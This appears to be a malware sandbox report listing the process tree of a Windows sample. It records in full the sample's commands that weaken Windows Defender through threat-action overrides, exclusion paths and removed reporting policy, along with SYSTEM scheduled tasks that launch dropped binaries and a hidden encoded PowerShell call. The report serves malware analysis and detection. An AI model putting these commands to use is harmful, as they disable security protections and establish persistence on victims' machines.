C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4064 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵
- Suspicious use of WriteProcessMemory
PID:3588 -
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵PID:2028
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵PID:544
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵PID:1064
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵PID:4456
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵PID:4692
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵PID:3348
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵PID:908
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵PID:4964
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵PID:1956
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵PID:4824
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵PID:2880
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵PID:3112
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵PID:1948
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵PID:2768
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵PID:1068
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵PID:2568
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵PID:4024
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵PID:2628
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵PID:4148
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵PID:1416
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵PID:1736
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵PID:4536
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵PID:1056
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵PID:2024
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\AJYQrkrAhIRXC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\AJYQrkrAhIRXC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\CrVpqlWoU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\CrVpqlWoU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\LzmXMIHnPUltEyKLVfR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\LzmXMIHnPUltEyKLVfR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\lVrlTdgfhXOU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\lVrlTdgfhXOU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\oQtMlHEnfKUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\oQtMlHEnfKUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\hfmUoVlnDXXxKeVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\hfmUoVlnDXXxKeVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\LcMDsXLSmMLmtBGQR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\LcMDsXLSmMLmtBGQR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\PtFLChdTWFkbMOwK\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\PtFLChdTWFkbMOwK\" /t REG_DWORD /d 0 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4704 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AJYQrkrAhIRXC" /t REG_DWORD /d 0 /reg:323⤵PID:3396
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AJYQrkrAhIRXC" /t REG_DWORD /d 0 /reg:324⤵PID:2324
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AJYQrkrAhIRXC" /t REG_DWORD /d 0 /reg:643⤵PID:4508
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CrVpqlWoU" /t REG_DWORD /d 0 /reg:323⤵PID:4448
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CrVpqlWoU" /t REG_DWORD /d 0 /reg:643⤵PID:1784
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LzmXMIHnPUltEyKLVfR" /t REG_DWORD /d 0 /reg:323⤵PID:872
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LzmXMIHnPUltEyKLVfR" /t REG_DWORD /d 0 /reg:643⤵PID:4404
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\lVrlTdgfhXOU2" /t REG_DWORD /d 0 /reg:323⤵PID:1708
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\lVrlTdgfhXOU2" /t REG_DWORD /d 0 /reg:643⤵PID:1136
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oQtMlHEnfKUn" /t REG_DWORD /d 0 /reg:323⤵PID:620
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oQtMlHEnfKUn" /t REG_DWORD /d 0 /reg:643⤵PID:5108
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\hfmUoVlnDXXxKeVB /t REG_DWORD /d 0 /reg:323⤵PID:3464
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\hfmUoVlnDXXxKeVB /t REG_DWORD /d 0 /reg:643⤵PID:624
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\LcMDsXLSmMLmtBGQR /t REG_DWORD /d 0 /reg:323⤵PID:1040
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\LcMDsXLSmMLmtBGQR /t REG_DWORD /d 0 /reg:643⤵PID:4820
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\PtFLChdTWFkbMOwK /t REG_DWORD /d 0 /reg:323⤵PID:3248
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\PtFLChdTWFkbMOwK /t REG_DWORD /d 0 /reg:643⤵PID:3680
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gBikpvDjR" /SC once /ST 04:33:43 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- Creates scheduled task(s)
PID:3992
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gBikpvDjR"2⤵PID:3712
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gBikpvDjR"2⤵PID:3460
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "wLvsIRnBfEcGhlAOV" /SC once /ST 01:37:54 /RU "SYSTEM" /TR "\"C:\Windows\Temp\PtFLChdTWFkbMOwK\kDJwecmhGUrPQUQ\CCgOIWq.exe\" 0b /site_id 525403 /S" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:4384
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "wLvsIRnBfEcGhlAOV"2⤵PID:3348
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1724 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:1108
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵PID:2764
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:540
-
C:\Windows\Temp\PtFLChdTWFkbMOwK\kDJwecmhGUrPQUQ\CCgOIWq.exeC:\Windows\Temp\PtFLChdTWFkbMOwK\kDJwecmhGUrPQUQ\CCgOIWq.exe 0b /site_id 525403 /S1⤵
- Executes dropped EXE
- Checks computer location settings
- Drops Chrome extension
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:3492 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bKFjthDDlmdmBdSpYV"2⤵PID:380
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:322⤵PID:4720
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:323⤵PID:4528
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:642⤵PID:4024
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:643⤵PID:1604
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\CrVpqlWoU\KOvRAz.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "gJECdJUNuqvNlNQ" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:2152
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gJECdJUNuqvNlNQ2" /F /xml "C:\Program Files (x86)\CrVpqlWoU\vfHuAIq.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:4336
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "gJECdJUNuqvNlNQ"2⤵PID:3500
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gJECdJUNuqvNlNQ"2⤵PID:3396
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "zMXAekEoOFzMiq" /F /xml "C:\Program Files (x86)\lVrlTdgfhXOU2\pMKcXze.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:3916
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gzmbNextDjATo2" /F /xml "C:\ProgramData\hfmUoVlnDXXxKeVB\DhNZcWP.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:4404
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "CPJtugmqbghMWscDr2" /F /xml "C:\Program Files (x86)\LzmXMIHnPUltEyKLVfR\LNrfmbR.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:3064
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "DmuWdpWCmdYRHkgJrjb2" /F /xml "C:\Program Files (x86)\AJYQrkrAhIRXC\pZQHVgb.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:5068
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "CDUwqlMPSeBRbvnPZ" /SC once /ST 01:23:39 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\PtFLChdTWFkbMOwK\vgOsuUIO\goUHniF.dll\",#1 /site_id 525403" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:4820
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "CDUwqlMPSeBRbvnPZ"2⤵PID:4124
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:322⤵PID:1516
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:323⤵PID:372
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:642⤵PID:1756
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:643⤵PID:2072
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "wLvsIRnBfEcGhlAOV"2⤵PID:4400
-
-
C:\Windows\system32\rundll32.EXEC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\PtFLChdTWFkbMOwK\vgOsuUIO\goUHniF.dll",#1 /site_id 5254031⤵PID:3616
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\PtFLChdTWFkbMOwK\vgOsuUIO\goUHniF.dll",#1 /site_id 5254032⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:4708 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "CDUwqlMPSeBRbvnPZ"3⤵PID:4132
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5a1c6cba0a29f7969952338b4204bc1b4
SHA1d691f23696629c2381962f63a77b7e6ec331cb33
SHA25635c2be2cfee8c19f3e334c2f99713784450fa7d77fc764184f35126569452c9c
SHA51283cab239f1a72bee5db9e6a1188e3a0e0e09067953aaa9cae75099a83535aa4623d2402589294a5efadb3d3a5e7e12b3bd1650007d3c3be14982fdf413c6475d
-
Filesize
2KB
MD57282644773107a5951cbb3e5f10ee16a
SHA1d09b8839af87bc64e4cf4ac951c9886c9c51f2d1
SHA2564184fe5fd6d6fe3c6e8c3deafb1120162f183cc5cef94ae5a46ad67239809718
SHA5128ee7f321feb5f70981fb041f1e8cc9dbd2611e29f3cbec9691904faca7d3989f612b6c1caf9c4929c3f20b4dbb73312c80a03c225539a3c34aa42e4ca8418f26
-
Filesize
2KB
MD5ce19825b637484819e68321b224e8043
SHA1bc4fb2a2c666a99195a0b2027289857d6a90b9da
SHA256f50f9ca77c1f5b513e9de994fbcd2cf9b3c6cbf4c4a87a0c0fcdc5ee3d45cfcb
SHA512e23729d3440be366fe611e71a377d8aec26d24c0e05c56503a7c501c456a927b378c0e3f021ad2df6e4b6a9fed2b2b6f7eeacdf297d51ef94eccfc23455472d3
-
Filesize
2KB
MD578f5b98f8c7fb2bd71e575f9969cb919
SHA1360ae3c9c78fdf6c2adb5aeefd806fef2dd64b6e
SHA256cee0b600e6d9e5bd6e9900cce7629c0065fd7e0cc9ca530f2f4479da86feab69
SHA5126292f3aef8d9c216bbedd93874e2e6d874c271139bd42dfec8455f33b63175e7d9f1882d4df86af48849c78cebde264d1aceff9d4089ea08a409f62a8a088064
-
Filesize
2KB
MD58546f50413a30920b11d6df13235756e
SHA1df2332b7ddec24801e815d1df8ccf9f886a550c6
SHA2568bbe39ec367b3ebbdc53784f3c7f8ebcc1ba67591e5154a3d313c785fad54cdf
SHA512f108a655b3becd86bc4128b164dcaa484096b3995c45bbbd68f1b9885f8a0f9b5996543bc765664f86266c71154f006c7befe972721f06b6f51bf97aea064a26
-
Filesize
2KB
MD56cf293cb4d80be23433eecf74ddb5503
SHA124fe4752df102c2ef492954d6b046cb5512ad408
SHA256b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
SHA5120f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00
-
Filesize
64B
MD55caad758326454b5788ec35315c4c304
SHA13aef8dba8042662a7fcf97e51047dc636b4d4724
SHA25683e613b6dc8d70e3bb67c58535e014f58f3e8b2921e93b55137d799fc8c56391
SHA5124e0d443cf81e2f49829b0a458a08294bf1bdc0e38d3a938fb8274eeb637d9a688b14c7999dd6b86a31fcec839a9e8c1a9611ed0bbae8bd59caa9dba1e8253693
-
Filesize
6.3MB
MD5c6a7d2c13bed9fd8b11af02dbcbc9dce
SHA1ed63ef9690334bd7fb03cd146854151458a9a546
SHA256a04c8b11a320ed3455436d31cbed8d1baff35eae747a3e0ec52662452e36a681
